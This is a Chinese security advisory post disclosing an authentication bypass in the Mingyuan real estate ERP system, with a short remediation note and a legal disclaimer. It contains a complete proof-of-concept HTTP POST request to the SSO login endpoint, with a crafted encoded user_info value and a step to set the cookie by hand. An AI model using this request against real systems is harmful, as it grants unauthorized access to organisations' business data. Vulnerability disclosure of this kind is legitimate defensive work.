文章总结： 本文披露了明源地产ERP系统存在身份认证绕过漏洞，攻击者可通过构造特定POST请求绕过验证机制，非法访问受保护资源并执行未授权操作，威胁系统安全。文章提供了详细的验证POC及截图，建议厂商及时安装补丁或部署防护设备进行拦截修复。 综合评分： 60 文章分类： 漏洞POC,漏洞预警,WEB安全,渗透测试,漏洞分析

漏洞验证-明源地产ERP存在身份认证绕过漏洞

Domren Domren

网安智界

2026年1月28日 10:39 浙江

一、漏洞描述

明源地产ERP存在身份认证绕过漏洞，攻击者可以访问受保护的资源，执行未授权操作，从而危害系统的安全性和完整性。

二、验证POC

POST /PubPlatform/nav/login/sso/login.aspx HTTP/1.1 Host: XXXX User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko Accept: */* Accept-Encoding: gzip,deflate Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 166

__yzsAppSecret=testtest&user_info=%66%79%6d%71%35%62%49%63%78%58%5a%49%78%75%36%4b%6c%6c%73%46%49%52%32%5a%77%45%4a%4b%2b%56%45%39%35%44%6b%78%2f%43%6e%46%67%46%51%3d

http://XXXX/PubPlatform/Nav/Home/

手动设置cookie

三、验证截图

四、整改建议

请联系厂商安装补丁或使用防护设备进行拦截。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网安智界 Domren Domren《漏洞验证-明源地产ERP存在身份认证绕过漏洞》